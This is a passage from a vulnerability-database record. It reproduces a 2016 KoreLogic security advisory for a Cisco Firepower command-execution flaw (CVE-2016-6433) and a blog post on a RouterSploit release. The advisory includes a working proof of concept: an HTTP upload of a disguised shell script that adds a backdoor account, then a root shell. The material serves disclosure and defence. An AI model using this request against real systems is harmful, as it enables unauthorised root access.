https://www.korelogic.com/Resources/Advisories/KL-001-2016-007.txt\r\n\r\n\r\n1. Vulnerability Details\r\n\r\n Affected Vendor: Cisco\r\n Affected Product: Firepower Threat Management Console\r\n Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)\r\n Platform: Embedded Linux\r\n CWE Classification: CWE-434: Unrestricted Upload of File with Dangerous\r\n Type, CWE-94: Improper Control of Generation of Code\r\n Impact: Arbitrary Code Execution\r\n Attack vector: HTTP\r\n CVE-ID: CVE-2016-6433\r\n\r\n2. Vulnerability Description\r\n\r\n An authenticated user can run arbitrary system commands as\r\n the www user which leads to root.\r\n\r\n3. Technical Description\r\n\r\n A valid session and CSRF token is required. The webserver runs as\r\n a non-root user which is permitted to sudo commands as root with\r\n no password.\r\n\r\n POST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1\r\n Host: 1.3.3.7\r\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0)\r\nGecko/20100101 Firefox/45.0\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n Accept-Language: en-US,en;q=0.5\r\n Accept-Encoding: gzip, deflate, br\r\n DNT: 1\r\n Cookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6\r\n Connection: close\r\n Content-Type: multipart/form-data;\r\nboundary=---------------------------15519792567789791301241925798\r\n Content-Length: 813\r\n\r\n -----------------------------15519792567789791301241925798\r\n Content-Disposition: form-data; name=\"manual_update\"\r\n\r\n 1\r\n -----------------------------15519792567789791301241925798\r\n Content-Disposition: form-data; name=\"source\"\r\n\r\n file\r\n -----------------------------15519792567789791301241925798\r\n Content-Disposition: form-data; name=\"file\";\r\nfilename=\"Sourcefire_Rule_Update-2016-03-04-001-vrt.sh\"\r\n Content-Type: application/octet-stream\r\n\r\n sudo useradd -G ldapgroup -p `openssl passwd -1 korelogic` korelogic\r\n -----------------------------15519792567789791301241925798\r\n Content-Disposition: form-data; name=\"action_submit\"\r\n\r\n Import\r\n -----------------------------15519792567789791301241925798\r\n Content-Disposition: form-data; name=\"sf_action_id\"\r\n\r\n 8c6059ae8dbedc089877b16b7be2ae7f\r\n -----------------------------15519792567789791301241925798--\r\n\r\n\r\n HTTP/1.1 200 OK\r\n Date: Sat, 23 Apr 2016 13:38:01 GMT\r\n Server: Apache\r\n Vary: Accept-Encoding\r\n X-Frame-Options: SAMEORIGIN\r\n Content-Length: 49998\r\n Connection: close\r\n Content-Type: text/html; charset=utf-8\r\n\r\n ...\r\n\r\n $ ssh korelogic@1.3.3.7\r\n Password:\r\n\r\n Copyright 2004-2016, Cisco and/or its affiliates. All rights reserved.\r\n Cisco is a registered trademark of Cisco Systems, Inc.\r\n All other trademarks are property of their respective owners.\r\n\r\n Cisco Fire Linux OS v6.0.1 (build 37)\r\n Cisco Firepower Management Center for VMWare v6.0.1 (build 1213)\r\n\r\n Could not chdir to home directory /Volume/home/korelogic: No such file or\r\ndirectory\r\n korelogic@firepower:/$ sudo su -\r\n Password:\r\n root@firepower:~#\r\n\r\n4. Mitigation and Remediation Recommendation\r\n\r\n The vendor has acknowledged this vulnerability but has\r\n not issued a fix. Vendor acknowledgement available at:\r\n\r\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin (@thatguylevel) of\r\nKoreLogic, Inc.\r\n\r\n6. Disclosure Timeline\r\n\r\n 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.\r\n 2016.06.30 - Cisco acknowledges receipt of vulnerability report.\r\n 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for\r\n this vulnerability and for 3 others reported in the\r\n same product.\r\n 2016.08.12 - 30 business days have elapsed since the vulnerability was\r\n reported to Cisco.\r\n 2016.09.02 - 45 business days have elapsed since the vulnerability was\r\n reported to Cisco.\r\n 2016.09.09 - KoreLogic asks for an update on the status of the\r\n remediation efforts.\r\n 2016.09.15 - Cisco confirms remediation is underway and soon to be\r\n completed.\r\n 2016.09.28 - Cisco informs KoreLogic that the acknowledgement details\r\n will be released publicly on 2016.10.05.\r\n 2016.10.05 - Public disclosure.\r\n\r\n7. Proof of Concept\r\n\r\n See Technical Description\r\n\r\n\r\nThe contents of this advisory are copyright(c) 2016\r\nKoreLogic, Inc. and are licensed under a Creative Commons\r\nAttribution Share-Alike 4.0 (United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. is a founder-owned and operated company with a\r\nproven track record of providing security services to entities\r\nranging from Fortune 500 to small and mid-sized companies. We\r\nare a highly skilled team of senior security consultants doing\r\nby-hand security assessments for the most important networks in\r\nthe U.S. and around the world. We are also developers of various\r\ntools and resources aimed at helping the security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt", "sourceHref": "https://www.exploit-db.com/download/40463", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "pentestit": [{"lastseen": "2018-10-18T18:23:37", "description": "PenTestIT RSS Feed\n\n**RouterSploit 3.4.0**, the long awaited [_router exploitation framework_](<http://pentestit.com/routersploit-router-exploitation-framework/>) update is out guys! This release includes some really cool features and updates such as using `pycryptodome` from `pycrypto`and newer exploitation modules! Read on for the improvements.\n\n![RouterSploit 3.4.0](http://pentestit.com/wp-content/uploads/2018/08/RouterSploit-3.3.0.png)\n\nWhat is RouterSploit?\n\n> The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. It consists of the following modules that aids penetration testing operations:\n> \n> * exploits \u2013 modules that take advantage of identified vulnerabilities\n> * creds \u2013 modules designed to test credentials against network services\n> * scanners \u2013 modules that check if a target is vulnerable to any exploit\n> * payloads \u2013 modules that are responsible for generating payloads for various architectures and injection points\n> * generic \u2013 modules that perform generic attacks\n\n## Official RouterSploit 3.4.0 changelog:\n\n * Fixing `setup.py` resources\n * Switching to pycroptodome\n * Fixing communication API\n * Adding `exploits/routers/asus/asuswrt_lan_rce.py` module (CVE-2018-5999/CVE-2018-6000)\n * Fixing `exploits/routers/asus/infosvr_backdoor_rce.py` module\n * Adding credentials used by Mirai botnet\n * Fixing 3com Officeconnect RCE module\n * Fixing `exploits/routers/billion/billion_5200w_rce.py` module\n * Fixing `exploits/routers/cisco/catalyst_2960_rocem.py` module (CVE-2017-3881)\n * Fixing `exploits/routers/cisco/firepower_management60_rce.py` module (CVE-2016-6433)\n * Fixing `exploits/routers/dlink/dir_815_850l_rce.py` module\n * Fixing `exploits/routers/multi/tcp_32764_rce.py` module\n * Fixing `exploits/routers/ubiquiti/airos_6_x.py` module\n * Adding `OptEncoder` option\n * Fixing `use` command issue\n * Adding tests `tests/exploits/cameras/cisco/test_video_surv_path_traversal.py`\n * Adding tests for modules default values\n * Adding tests `tests/exploits/routers/asus/test_infosvr_backdoor_rce.py`\n * Adding tests `tests/exploits/routers/billion/test_billion_5200w_rce.py`\n * Adding tests `tests/exploits/routers/cisco/test_firepower_management60_rce.py`\n * Adding tests `tests/exploits/routers/cisco/test_secure_acs_bypass.py`\n * Adding tests `tests/exploits/routers/dlink/test_dcs_930l_auth_rce.py`\n * Adding tests `tests/exploits/routers/technicolor/test_tg784_authbypass.py`\n * Adding tests `tests/exploits/routers/dlink/test_dsl_2730b_2780b_526b_dns_change.py`\n * Fixing `exploits/routers/ipfire/ipfire_proxy_rce.py` module\n * Fixing `exploits/routers/ipfire/ipfire_shellshock.py` module\n * Adding `exploits/routers/linksys/eseries_themoon_rce.py` module\n\n## Install RouterSploit 3.4.0:\n\nIf you have an older version checked out, all you now need to get the latest version is run: `git pull` in the installed directory and you should be updated to the latest version. In case you do not have it installed, the current version is RouterSploit 3.4.0. Check out the [GIT repository](<https://github.com/threat9/routersploit>), and run\n \n \n pip3 install -r requirements.txt\n ./rsf.py\n\nThe post [UPDATED VERSION: RouterSploit 3.4.0](<http://pentestit.com/updated-version-routersploit-3-4-0/>) appeared first on [PenTestIT](<http://pentestit.com>).", "cvss3": {}, "published": "2018-10-18T18:13:04", "type": "pentestit", "title": "UPDATED VERSION: RouterSploit 3.4.0", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2016-6433", "CVE-2017-3881", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-10-18T18:13:04", "id": "PENTESTIT:30AF1FB3AAE47288E800B5587788AF45", "href": "http://pentestit.com/updated-version-routersploit-3-4-0/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}

Cisco Firepower Threat Management Console Remote Command Execution Vulnerability

Description

Related